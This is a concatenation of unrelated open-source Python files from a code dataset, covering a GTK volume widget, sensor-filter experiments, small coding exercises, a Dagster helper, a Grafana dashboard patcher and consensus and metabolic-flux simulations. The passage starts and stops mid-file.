Gtk.Box()\n\t\tbox.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tbox.pack_start(self.label, False, False, 0)\n\t\tbox.pack_start(self.slider, True, True, 0)\n\t\tbox.pack_start(self.button, False, False, 0)\n\t\tself.popup = util.make_popup(util.framed(box), self)\n\n\tdef unsetSink(self):\n\t\tif self.default_sink:\n\t\t\tself.pulse_core.StopListeningForSignal(\"org.PulseAudio.Core1.Device.VolumeUpdated\", dbus_interface=\"org.PulseAudio.Core1\")\n\t\t\tself.pulse_core.StopListeningForSignal(\"org.PulseAudio.Core1.Device.MuteUpdated\", dbus_interface=\"org.PulseAudio.Core1\")\n\n\tdef updateSink(self, sink):\n\t\tself.unsetSink()\n\t\tself.default_sink = self.pulse_bus.get_object(None, sink)\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.Device.VolumeUpdated\", [self.default_sink], dbus_interface=\"org.PulseAudio.Core1\")\n\t\tself.pulse_core.ListenForSignal(\"org.PulseAudio.Core1.Device.MuteUpdated\", [self.default_sink], dbus_interface=\"org.PulseAudio.Core1\")\n\t\tself.updateVolume(self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus_interface=PROPS))\n\t\tself.updateMute(self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Mute\", dbus_interface=PROPS))\n\n\tdef updateVolume(self, vol):\n\t\tself.text.set_text(\"{:.0f}%\".format(100 * max(vol) / VOLUME_NORM))\n\t\tself.icon.set_text(\"♪\")\n\t\tself.slider.set_value(max(vol))\n\t\tself._updatePopup()\n\n\tdef updateMute(self, mute):\n\t\tself.set_opacity(0.5 if mute else 1)\n\t\tself.button.set_icon_name(\"audio-volume-muted\" if mute else \"audio-volume-high\")\n\n\tdef click(self, _, evt):\n\t\tif (evt.button, evt.type) == (1, Gdk.EventType.BUTTON_PRESS):\n\t\t\tif self.popup.is_visible():\n\t\t\t\tself.popup.hide()\n\t\t\telse:\n\t\t\t\tself.popup.show_all()\n\n\tdef _updatePopup(self):\n\t\tself.label.set_markup(LABEL_FORMAT.format(volume_to_db(int(self.slider.get_value()))))\n\n\tdef changeSlider(self, w, mode, val):\n\t\ta = w.get_adjustment()\n\t\tif val < a.get_lower(): val = a.get_lower()\n\t\tif val > a.get_upper(): val = a.get_upper()\n\t\tval = round(val / VOLUME_NORM * 100) * VOLUME_NORM / 100\n\t\tself.default_sink.Set(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus.Array([int(val)], \"u\"), dbus_interface=PROPS)\n\n\tdef toggleMute(self, _):\n\t\tself.default_sink.Set(\"org.PulseAudio.Core1.Device\", \"Mute\", not self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Mute\", dbus_interface=PROPS), dbus_interface=PROPS)\n\n\tdef changeVolume(self, _, d):\n\t\tval = max(self.default_sink.Get(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus_interface=PROPS))\n\t\tval = round(val / VOLUME_NORM * 100 + d) * VOLUME_NORM / 100\n\t\tif val < 0: val = 0\n\t\tself.default_sink.Set(\"org.PulseAudio.Core1.Device\", \"Volume\", dbus.Array([int(val)], \"u\"), dbus_interface=PROPS)\n","repo_name":"Kyuuhachi/Icebar-legacy","sub_path":"widgets/volume_pulse.py","file_name":"volume_pulse.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34696600546","text":"\"\"\"Find what initial beta values require the largest fix\"\"\"\n# %%\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\nimport numpy as np\nimport scipy.optimize\n\nimport madfilters.py as py\nimport madfilters.cpp as cpp\nimport madfilters.utils.io as io\nimport madfilters.utils.orientation as ot\n\n\n# Load imu data\nacc, gyr, mag, times, q0, freq = io.load_sample_data()\n\n# Through the ahrs module's madgwick, this gives us a \"source of truth\" to compare to\nahrs_filter = py.AhrsMadgwick(beta=0.1, freq=freq, q0=q0)\nahrs_Q = ahrs_filter.update(acc, gyr, mag)\n\n#Cut down data for less calculations\nmask = (times > 6) & (times<15)\nacc=acc[mask]\ngyr=gyr[mask]\nmag=mag[mask]\ntimes=times[mask]\nQ_comp=ahrs_Q[mask]\nq0 = Q_comp[0]\n\n\ndef find_optimum_beta(beta_base, base_filter, free_filter):\n \"\"\"Evaluates the best beta to use on the free filter, given the base filter's beta\"\"\"\n\n Q_base = base_filter.update(acc=acc, gyr=gyr, mag=mag, q=q0, beta=beta_base)\n \n \n def quat_diff(beta, Q_base, free_filter):\n \"\"\"Calculate quaternions and average difference\"\"\"\n Q_free = free_filter.update(acc, gyr, mag, beta=beta, q=q0)\n diff = ot.q_angle_diff_safe(Q_base, Q_free)\n return np.average(diff)\n\n\n result = scipy.optimize.minimize(fun=quat_diff, args=(Q_base, free_filter), \n x0 = beta_base, method='Nelder-Mead', options=dict(maxiter=100))\n\n beta_optimum = result.x[0]\n\n return beta_optimum\n\ndef find_optimum_betas(base_filter, free_filter):\n betas = np.linspace(0.001,1,10)\n vbeta_diff = np.vectorize(find_optimum_beta)\n y_values = vbeta_diff(betas, base_filter, free_filter)\n\n return betas, y_values\n\nmad_filter = cpp.MadgwickOriginalSqrt(freq=freq)\n\nbetas, y_values = find_optimum_betas(base_filter=ahrs_filter, free_filter=mad_filter)\n\nfig = plt.figure(figsize=(14, 9), facecolor=\"w\")\n\nfig.suptitle('Beta Conversions', fontsize=16)\n\nax0 = fig.add_subplot(211)\nax0.plot(betas, y_values/betas, label='Py AHRS vs original C')\nax0.set(xlabel='Py Ahrs beta', ylabel='beta ratio: C / Py Ahrs', title=\"Ratio of beta values\")\nax0.grid()\nax0.legend()\n\n\nfixed_filter = cpp.MadgwickFixed(freq=freq)\n\nsqrt_betas, fixed_betas = find_optimum_betas(base_filter=mad_filter, free_filter=fixed_filter)\n\nax1 = fig.add_subplot(212)\nax1.plot(sqrt_betas, fixed_betas, label='Fixed C')\nax1.set(xlabel='Sqrt C beta', ylabel='Fixed C beta', title=\"Bug -> Fix conversion\")\nax1.grid()\n\nplt.subplots_adjust(hspace=0.3)\n\nplt.savefig(f\"./exp7_beta_conversions.png\", transparent=False)\nplt.show()\n","repo_name":"RideBeeline/madgwick-investigation","sub_path":"experiment_7_beta_fix/beta_conversions.py","file_name":"beta_conversions.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"73953935209","text":"\n\n\ndef minCostClimbingStairs(cost):\n if not cost:\n return 0\n\n current = next = 0\n for i in reversed(range(len(cost))):\n current, next = next, min(next, current) + cost[i]\n return min(current, next)\n \n # dp = [0] * len(cost)\n\n # dp[0] = cost[0]\n\n # if len(cost) > 1:\n # dp[1] = cost[1]\n\n # for i in range(2, len(cost)):\n # dp[i] = cost[i] + min(dp[i-2], dp[i-1])\n\n # return min(dp[-2], dp[-1])\n\n\nprint(minCostClimbingStairs([10, 15, 20]))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/minCostClimbingStairs.py","file_name":"minCostClimbingStairs.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2238172848","text":"#!/usr/bin/env python3\nfrom glob import glob\nimport os.path\nimport sys\n\nsys.path[0:0] = [\"../..\"]\n\nfailed = False\ntry:\n from osaca.semantics.hw_model import MachineModel\nexcept ModuleNotFoundError:\n print(\n \"Unable to import MachineModel, probably some dependency is not yet installed. SKIPPING. \"\n \"First run of OSACA may take a while to build caches, subsequent runs will be as fast as \"\n \"ever.\"\n )\n sys.exit()\n\nprint(\"Building cache: \", end=\"\")\nsys.stdout.flush()\n\n# Iterating architectures\nfor f in glob(os.path.join(os.path.dirname(__file__), \"*.yml\")):\n MachineModel(path_to_yaml=f)\n print(\".\", end=\"\")\n sys.stdout.flush()\n\n# Iterating ISAs\nfor f in glob(os.path.join(os.path.dirname(__file__), \"isa/*.yml\")):\n MachineModel(path_to_yaml=f)\n print(\"+\", end=\"\")\n sys.stdout.flush()\n\nprint()\n","repo_name":"RRZE-HPC/OSACA","sub_path":"osaca/data/_build_cache.py","file_name":"_build_cache.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"53"} +{"seq_id":"24498880381","text":"\"\"\"\nmdahole2\nA Python interface for the HOLE suite tools to analyze an ion channel pore or transporter pathway as a function of time or arbitrary order parameters.\n\"\"\"\n\n# Handle versioneer\nfrom ._version import get_versions\nversions = get_versions()\n__version__ = versions['version']\n__git_revision__ = versions['full-revisionid']\ndel get_versions, versions\n","repo_name":"MDAnalysis/hole2-mdakit","sub_path":"mdahole2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"9888002807","text":"# Utility script for managing compute log stdout mirroring\n#\n# This script is run as a subprocess during step computation to babysit a tail child process which\n# mirrors compute log output from a file to stdout. This utility script checks to see if its parent\n# process has died and kills the tail child process if so. This is to ensure that execution that\n# suddenly exits mid-computation without cleaning up after itself will not orphan long-lived tail\n# processes.\n\nimport os\nimport signal\nimport sys\nimport time\n\n\ndef watch(args):\n if not args or len(args) != 2:\n return\n\n parent_pid = int(args[0])\n tail_pid = int(args[1])\n\n if not parent_pid or not tail_pid:\n return\n\n while True:\n # check if this process has been orphaned, in which case kill the tail_pid\n\n # we assume that the process is orphaned if parent pid changes. because systemd\n # user instances also adopt processes, os.getppid() == 1 is no longer a reliable signal\n # for being orphaned.\n if os.getppid() != parent_pid:\n try:\n os.kill(tail_pid, signal.SIGTERM)\n except OSError:\n pass\n break\n else:\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n watch(sys.argv[1:])\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/execution/watch_orphans.py","file_name":"watch_orphans.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"33162714128","text":"class Tribonachi():\n cout = 1\n num1 = 0\n num2 = 0\n num3 = 0\n\n def __init__(self, num1, num2, num3):\n self.num1 = num1\n self.num2 = num2\n self.num3 = num3\n\n def iterationMethod(self, limit):\n for count in range(limit):\n result = self.num1 + self.num2 + self.num3\n print(self.num3)\n self.num1 = self.num2\n self.num2 = self.num3\n self.num3 = result\n\nlimit = int(input(\"Enter limit for digits of Tribonachi: \"))\n\ntribonachi = Tribonachi(1, 1, 1)\nprint(1)\nprint(1)\ntribonachi.iterationMethod(limit)\n","repo_name":"bembel1993/greatPython","sub_path":"- LAB_5_magic_method/Lab_5.py","file_name":"Lab_5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30091011194","text":"import collections\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\nfrom svm_model import SVM\nfrom kernels import rbf_kernel, poly_kernel\n\n\ndef test_svm(X_train, Y_train, X_test, Y_test, sigma, degree, kernel, C):\n kernel_parameter = sigma\n if kernel.__name__ == 'poly_kernel':\n kernel_parameter = degree\n svm_model = SVM(X_train, Y_train, kernel_parameter, kernel, C)\n alphas = svm_model.fit()\n b = svm_model.b(alphas)\n dec = []\n good_pred = 0\n Y_test_arr = np.array(Y_test)\n for i in range(len(X_test)):\n dec.append(svm_model.decision(alphas, X_test[i], b))\n if dec[i] == Y_test_arr[i]:\n good_pred += 1\n print(f'good predictions {good_pred}/{len(X_test)} -> {(good_pred / len(X_test)) * 100}%')\n good_wines = 0\n for i in dec:\n if i == 1:\n good_wines += 1\n occur = collections.Counter(Y_test_arr)\n print(f'number of good wines {good_wines}/{len(dec)} there is {occur[1]} good wines')\n print(f'number of bad {len(dec) - good_wines}/{len(dec)} there is {occur[-1]} bad wines')\n\ndef main():\n df = pd.read_csv('winequality-red.csv', header=0, sep=';')\n condition = df['quality'] > 5\n df['quality'] = np.where(condition, 1, -1)\n X = df.drop('quality', axis=1).copy()\n Y = df['quality'].copy()\n X = normalize(X, axis=0)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, train_size=0.8, test_size=0.2, shuffle=False, random_state=42)\n sigma = 0.1\n degree = 100\n C = 1\n test_svm(X_train, Y_train, X_test, Y_test, sigma, degree, poly_kernel, C)\n\n\nif __name__ == '__main__':\n SystemExit(main())\n","repo_name":"maciejgrosz/AI-wsi","sub_path":"svm-classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1167388653","text":"\"\"\"\nGiven two Python sets, write a Python program to update the first set with items that exist only in the first set and not in the second set\n\nHints: Search about difference_update() function in set\n\nGiven Sets\nset1 = {10, 20, 30}\nset2 = {20, 40, 50}\n\nExpected Output:\n{10, 30}\n\n\"\"\"\n\nset1 = {10, 20, 30}\nset2 = {20, 40, 50}\n\nfor item in set2 :\n for item2 in set1.copy() :\n if item == item2 :\n set1.remove(item)\n\nprint(set1)\n\n\n","repo_name":"Saad-001/learning-python-with-problem-solving","sub_path":"week_2/practice_modules/practice_module_1/prob_10.py","file_name":"prob_10.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28236920626","text":"from PyQt5.QtCore import QThread, pyqtSignal\n\n\nclass ExportThread(QThread):\n finishSignal = pyqtSignal()\n\n def __init__(self, func, args):\n super(ExportThread, self).__init__()\n self.func = func\n self.args = args\n\n def run(self):\n self.func(*self.args)\n self.finishSignal.emit()\n\n\nclass backUpThread(QThread):\n finishSignal = pyqtSignal(tuple)\n\n def __init__(self, func, args):\n super(backUpThread, self).__init__()\n self.func = func\n self.args = args\n self.ret = None\n\n def run(self):\n self.ret = self.func(*self.args)\n self.finishSignal.emit(self.ret)\n","repo_name":"zhj12138/MdLibrary","sub_path":"mythreads.py","file_name":"mythreads.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20987956978","text":"opcion = int(input(\"Desea ingresar datos? 1- Si, 0- No \"))\nprint()\nwhile opcion == 1:\n aire = int(input(\"Del 1 al 10 cual es la calidad del aire: \"))\n agua = int(input(\"Del 1 al 10 cual es la calidad del agua: \"))\n comida = int(input(\"Del 1 al 10 cual es la calidad de los alimentos que ingiere: \"))\n suma = aire + agua + comida\n if suma < 10:\n print(\"Su salud podria verse afectada por su estilo de calidad de vida\")\n elif suma > 20:\n print(\"Usted tiene una buena calidad de vida\")\n else:\n print(\"Su calidad de vida es aceptable, pero podria mejorar\")\n print()\n opcion = int(input(\"Desea ingresar datos? 1- Si, 0- No \"))\n","repo_name":"FerroSantiago/PythonFundamentos","sub_path":"estructuras.py","file_name":"estructuras.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892306856","text":"import matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as ss\nfrom matplotlib.animation import FuncAnimation\n\nfrom protocol import SnowballProtocol\n\n\ndef snowball(args):\n proto = SnowballProtocol(args)\n\n verbose = args.verbose_every is not None\n\n if verbose:\n print(\"Running snowball\")\n print(proto.snowball_map)\n\n done = False\n while not done:\n done = proto.step()\n\n if verbose and proto.iteration % args.verbose_every == 0:\n print(f\"Iteration: {proto.iteration}\")\n print(f\"Remaining participants:\", len(proto.running_participants) - proto.adversaries_num)\n print(\"Snowball map:\", proto.snowball_map)\n\n if verbose:\n print(\"Consensus:\", proto.consensus)\n print(\"Snowball iterations:\", proto.iteration)\n print(proto.snowball_map)\n\n return proto\n\n\ndef snowball_plt(args):\n proto = SnowballProtocol(args)\n\n snowball_map = proto.snowball_map\n fig = plt.figure()\n\n col_dist = fig.add_subplot(221)\n pnts = col_dist.scatter([0, 1], [snowball_map[True], snowball_map[False]], color=\"red blue\".split())\n col_dist.set_xlim(-1, 2)\n col_dist.set_ylim(0, proto.good_num)\n\n corr_ax = fig.add_subplot(222)\n corr_ax.set_title(\"Count confidence correlation\")\n\n count_ax = fig.add_subplot(223)\n count_ax.set_title(\"Participants count distribution\")\n count_true_line, = count_ax.plot([], [], color=\"red\")\n count_false_line, = count_ax.plot([], [], color=\"blue\")\n\n confidence_ax = fig.add_subplot(224)\n confidence_ax.set_title(\"Participants confidence distribution\")\n confidence_true_line, = confidence_ax.plot([], [], color=\"red\")\n confidence_false_line, = confidence_ax.plot([], [], color=\"blue\")\n\n proto._removed = False\n\n def update(frame):\n for i in range(args.iterations_per_frame):\n done = proto.step()\n if done:\n break\n\n if args.remove_after is not None and not proto._removed:\n min_confidence = min(x.confidence for x in proto.participant_objects if not x.adversary)\n\n # Remove adversaries after all participants has confidence greater than some threshold\n if min_confidence >= args.remove_after:\n proto._removed = True\n proto.remove_adversaries()\n\n snowball_map = {False: 0, True: 0}\n count_map = {False: [], True: []}\n confidence_map = {False: [], True: []}\n\n for part in proto.participant_objects:\n # Only check for color of non adversarial participants\n if not part.adversary:\n snowball_map[part.color] += 1\n count_map[part.color].append(part.count)\n confidence_map[part.color].append(part.confidence)\n\n def kde_helper(data, x, line):\n max_y = 0\n try:\n kde = ss.gaussian_kde(data)\n y = kde(x)\n max_y = max(y)\n line.set_data(x, y)\n # Exceptions to handle degenerated data\n except np.linalg.linalg.LinAlgError:\n pass\n except ValueError:\n pass\n finally:\n return max_y\n\n # Count graphic update\n max_count = max(count_map[True] + count_map[False])\n xcount = np.linspace(0, max_count, 1000)\n count_ax.set_xlim(0, max_count)\n count_ax_ylim = 0\n\n count_ax_ylim = max(count_ax_ylim, kde_helper(count_map[True], xcount, count_true_line))\n count_ax_ylim = max(count_ax_ylim, kde_helper(count_map[False], xcount, count_false_line))\n\n count_ax.set_ylim(0, count_ax_ylim)\n\n # Confidence graphic update\n\n max_confidence = max(confidence_map[True] + confidence_map[False])\n xconfidence = np.linspace(0, max_confidence, 1000)\n confidence_ax.set_xlim(0, max_confidence)\n confidence_ax_ylim = 0\n confidence_ax_ylim = max(confidence_ax_ylim,\n kde_helper(confidence_map[True], xconfidence, confidence_true_line))\n confidence_ax_ylim = max(confidence_ax_ylim,\n kde_helper(confidence_map[False], xconfidence, confidence_false_line))\n\n confidence_ax.set_ylim(0, confidence_ax_ylim)\n\n pnts.set_offsets([[0, snowball_map[True]], [1, snowball_map[False]]])\n\n corr_ax.clear()\n corr_ax.set_title(\"Count confidence correlation\")\n corr_ax.scatter(count_map[True], confidence_map[True], color='red')\n corr_ax.scatter(count_map[False], confidence_map[False], color='blue')\n corr_ax.set_ylim(0, None)\n\n col_dist.set_title(\n f\"Iteration: {proto.iteration} Red: {snowball_map[True]} Blue: {snowball_map[False]}\"\n f\" {'OFF' if proto._removed else 'ON'}\")\n\n return pnts, count_true_line, count_false_line\n\n print(\"Snowball\")\n\n _ = FuncAnimation(fig, update, interval=1, repeat=False)\n plt.show()\n","repo_name":"SkidanovAlex/snowball","sub_path":"snowball/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"2998321115","text":"import os\nimport copy\nimport logging\nimport urllib.parse\n\nimport requests\n\nlog = logging.getLogger(__name__)\n\n\nclass Api:\n def __init__(self, base_uri, token):\n self.base_url = base_uri\n self.session = requests.Session()\n self.session.headers['Authorization'] = 'Bearer ' + token\n\n def get(self, uri):\n resp = self.session.get(urllib.parse.urljoin(self.base_url, uri))\n resp.raise_for_status()\n return resp.json()\n\n def post(self, uri, **kwargs):\n resp = self.session.post(urllib.parse.urljoin(self.base_url, uri), **kwargs)\n resp.raise_for_status()\n return resp.json()\n\n\napi = Api(urllib.parse.urljoin(os.environ['GRAFANA_URL'], 'api/'), os.environ['GRAFANA_TOKEN'])\n\n\ndef main():\n logging.basicConfig()\n search_results = api.get('search')\n for dashboard_meta in search_results:\n if dashboard_meta['type'] == 'dash-db':\n try:\n patch_dashboard(dashboard_meta)\n except Exception:\n log.exception('Failed to patch dashboard %s', dashboard_meta['title'])\n\n\ndef patch_dashboard(dashboard_meta):\n uid = dashboard_meta['uid']\n dashboard = api.get(f'dashboards/uid/{uid}')['dashboard']\n original_dashboard = copy.deepcopy(dashboard)\n\n add_common_annotations(dashboard)\n\n if dashboard != original_dashboard:\n data = {\n 'dashboard': dashboard,\n 'message': 'add common annotations',\n 'overwrite': False,\n }\n api.post('dashboards/db/', json=data)\n print(f'PATCHED {dashboard_meta[\"title\"]}')\n\n\ndef add_common_annotations(dashboard):\n \"\"\"\n Makes our global \"a\" annotation visible in all dashboard panels\n \"\"\"\n annotation_srcs = dashboard['annotations']['list']\n annotation_src = next(src for src in annotation_srcs if src['datasource'] == '-- Grafana --')\n annotation_src['type'] = 'tags'\n annotation_src['matchAny'] = True\n if 'tags' not in annotation_src:\n annotation_src['tags'] = []\n if 'a' not in annotation_src['tags']:\n annotation_src['tags'].append('a')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"smpio/grafana-operator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35719376205","text":"import numpy as np\nimport pandas as pd\nimport cobra as cb\nfrom scipy.integrate import ode\nimport matplotlib.pyplot as plt\nimport json\nfrom datetime import date\nimport os\n\nsv = True\ntoday = date.today().strftime(\"%B%d%Y\")\n\n\n\ntry:\n direct = \"direct_meth/\" + today\n os.mkdir(direct)\nexcept:\n for i in range(100):\n direct = \"direct_meth/\" + today + \"_\" + str(i)\n try:\n os.mkdir(direct)\n break\n except:\n pass\n\n\n\n#xdot = x*growth rate\n#ydot = -x*flux\ndef dfba_RHS(t,y,params):\n model = params[0]\n exchg_order = params[1] #list of rxn ids in media file\n kappas = params[2]\n deathrate = params[3]\n inflow = params[4]\n x = y[0]\n yvec = y[1:]\n #reset the media file with kappa*y\n tmpmed = model.medium\n for i in range(len(yvec)):\n if exchg_order[i] in tmpmed.keys():\n tmpmed[exchg_order[i]] = kappas[i]*yvec[i]\n #optimize with cobra\n model.medium = tmpmed\n try:\n optm = model.optimize()\n xd = x*optm.objective_value - x*deathrate\n yd = list(np.array([x*optm.fluxes[exrn] if exrn in tmpmed.keys() else 0 for exrn in exchg_order]) + np.array(yvec)*np.array(inflow))\n dfba_RHS.optcount += 1\n except:\n xd = 0\n yd = [0 for i in exchg_order]\n dfba_RHS.failtimes += [t]\n return np.array([xd] + yd)\n\n\n\ndef com_dfba_RHS(t,y,params):\n models = params[0]\n exchg_order = params[1] #list of rxn ids in media file\n kappas = params[2]\n deathrates = params[3]\n inflow = params[4]\n xs = y[:len(models)]\n yvec = y[len(models):]\n xdts = []\n ydots = np.zeros(len(yvec))\n for i in range(len(models)):\n xx = xs[i]\n state_vec = np.array([xx] + list(yvec))\n rhs = dfba_RHS(t,state_vec,[models[i],exchg_order,kappas[i],deathrates[i],inflow])\n xdts += [rhs[0]]\n ydots = ydots + np.array(rhs[1:])\n return np.array([xdts + list(ydots)])\n\n\n\n\n\ncombos=[['E.coli','M.tuberculosis'],['E.coli','S.cerevisiae'],['S.cerevisiae','M.tuberculosis'],['E.coli','P.putida'],['E.coli','S.cerevisiae','M.tuberculosis'],['E.coli','S.cerevisiae','P.putida','M.tuberculosis']]\nfor desired_models in combos:\n model_file_info = pd.read_csv('bigg_model_file_info.txt',dtype = str)\n endt = 15\n\n cobra_models = {}\n\n for mod in desired_models:\n if any(model_file_info.Species == mod):\n flnm = model_file_info.loc[model_file_info.Species == mod,'File'].iloc[0]\n cobra_models[mod] = cb.io.load_json_model(flnm)\n if not cobra_models[mod].name:\n cobra_models[mod].name = model_file_info.loc[model_file_info.Species == mod,'Species'].iloc[0] + \"_\" + model_file_info.loc[model_file_info.Species == mod,'ID'].iloc[0]\n else:\n print(\"Error: No model of species \" + mod)\n\n\n print(\"Loaded \" + str(len(cobra_models)) + \" models successfully\")\n\n\n m9file = \"modelsfromBiGG/sample_models/m9med.csv\"\n kappa_fl = \"modelsfromBiGG/sample_models/model_exchange.json\"\n\n m9media_DF = pd.read_csv(m9file)\n with open(kappa_fl) as fl:\n kappa_vals = json.load(fl)\n\n\n\n #compute dfba\n # modl1 = cobra_models[desired_models[0]]\n # modl2 = cobra_models[desired_models[1]]\n ## Get exchange reactions from minimal medium (minimized by components)\n # initial_growth1 = modl1.slim_optimize()\n # min_med1 = cb.medium.minimal_medium(modl1,initial_growth1,minimize_components = True)\n # initial_growth2 = modl2.slim_optimize()\n # min_med2 = cb.medium.minimal_medium(modl2,initial_growth2,minimize_components = True)\n cust_media = {}\n modids = []\n kappas = []\n exchg_ids = []\n\n for model in desired_models:\n flnm = model_file_info.loc[model_file_info.Species == model,'File'].iloc[0]\n cobmod = cb.io.load_json_model(flnm)\n exrxns = [rxn.id for rxn in cobmod.reactions if 'EX' in rxn.id]\n modid = model_file_info.loc[model_file_info.Species == model,'ID'].iloc[0]\n # kappas_used[model] = dict([(m9media_DF.loc[i,'exchange reaction id'],1.0) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n # m9dict = dict([(m9media_DF.loc[i,'exchange reaction id'],(1.0*m9media_DF.loc[i,'initial metabolite value'])) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n\n # kappas_used[model] = dict([(m9media_DF.loc[i,'exchange reaction id'],kappa_vals[modid][m9media_DF.loc[i,'exchange reaction id']]) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n m9dict = dict([(m9media_DF.loc[i,'exchange reaction id'],(m9media_DF.loc[i,'initial metabolite value'])*kappa_vals[modid][m9media_DF.loc[i,'exchange reaction id']]) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n cust_media[model] = m9dict\n cobra_models[model].medium = m9dict\n # modids += [modid]\n exchg_ids += list(m9dict.keys())\n\n exchg_ids = list(np.unique(exchg_ids))\n\n for m in desired_models:\n kappas += [[kappa_vals[modid][exch] if exch in kappa_vals[modid].keys() else 0 for exch in exchg_ids]]\n\n\n y_init = [m9media_DF.loc[m9media_DF.loc[:,'exchange reaction id'] == er,'initial metabolite value'].values[0] for er in exchg_ids]\n flow = []\n for i in y_init:\n if i == 'D-Glucose':\n flow += [0.2]\n elif i == 'O2 O2':\n flow += [0.2]\n else:\n flow += [0]\n\n # exchg_ids = list(np.unique(list(cust_media[desired_models[0]].keys()) + list(cust_media[desired_models[1]].keys())))\n # modl1.medium = cust_media[desired_models[0]]\n # modl2.medium = cust_media[desired_models[1]]\n\n # modid1 = model_file_info.loc[model_file_info.Species == desired_models[0],'ID'].iloc[0]\n # modid2 = model_file_info.loc[model_file_info.Species == desired_models[1],'ID'].iloc[0]\n\n\n # kappa1 = [kappa_vals[modid1][exch] if exch in kappa_vals[modid1].keys() else 0 for exch in exchg_ids]\n # kappa2 = [kappa_vals[modid2][exch] if exch in kappa_vals[modid2].keys() else 0 for exch in exchg_ids]\n\n # print('EX_ca2_e' in cust_media[desired_models[0]].keys())\n # print('EX_ca2_e' in cust_media[desired_models[1]].keys())\n # print('EX_ca2_e' in kappa_vals[modid1].keys())\n # print('EX_ca2_e' in kappa_vals[modid2].keys())\n\n\n # y_init = [cust_media[desired_models[0]][exchg_ids[i]]/kappa_vals[modid1][exchg_ids[i]] if exchg_ids[i] in cust_media[desired_models[0]].keys() else cust_media[desired_models[1]][exchg_ids[i]]/kappa_vals[modid2][exchg_ids[i]] for i in range(len(exchg_ids))]\n\n\n with open(direct + \"/\" + \"_\".join(desired_models) + \"_log.txt\",'w') as logfl:\n\n logfl.write(\" & \".join(desired_models))\n\n\n\n x_init = [0.3]*len(desired_models)\n for meth in [\"vode\",\"zvode\",\"lsoda\",\"dopri5\",\"dop853\"]:\n\n logfl.write(\"Both:\" + meth + \"\\n\")\n\n #### intitialize ODE\n dfba2 = ode(com_dfba_RHS).set_integrator(meth)\n init_v = x_init + y_init\n dfba2.set_initial_value(init_v,0)\n dfba2.set_f_params([[cobra_models[desmod] for desmod in desired_models],exchg_ids,kappas,[0.2]*len(desired_models),flow])\n\n\n x = [np.array(x_init)]\n yv = [np.array(y_init)]\n t = [0]\n\n dfba_RHS.optcount = 0\n dfba_RHS.failtimes = []\n\n # x = dfba2.integrate(endt)\n\n while dfba2.t < endt and dfba2.successful():\n sl = dfba2.integrate(dfba2.t + 0.01)\n x += [sl[:len(desired_models)]]\n yv += [np.array(sl[len(desired_models):])]\n t += [dfba2.t]\n\n yv = np.array(yv)\n\n y2 = dict([(exchg_ids[i],yv.T[i]) for i in range(len(yv.T))])\n\n xd = dict([(desired_models[i],np.array(x).T[i]) for i in range(len(desired_models))])\n\n logfl.write(str(dfba_RHS.optcount) + '\\n\\n')\n # logfl.write(dfba_RHS.failtimes)\n\n if meth == \"vode\":\n fig,ax = plt.subplots(2,1,figsize = (10,10),tight_layout = True)\n if len(x) < 9:\n ax[0].set_prop_cycle(cycler(color = ['green', 'red','blue','purple','cyan','deeppink','goldenrod','slategray']))\n\n\n\n labels1 = []\n labels2 = []\n\n\n for nm,tc in xd.items():\n 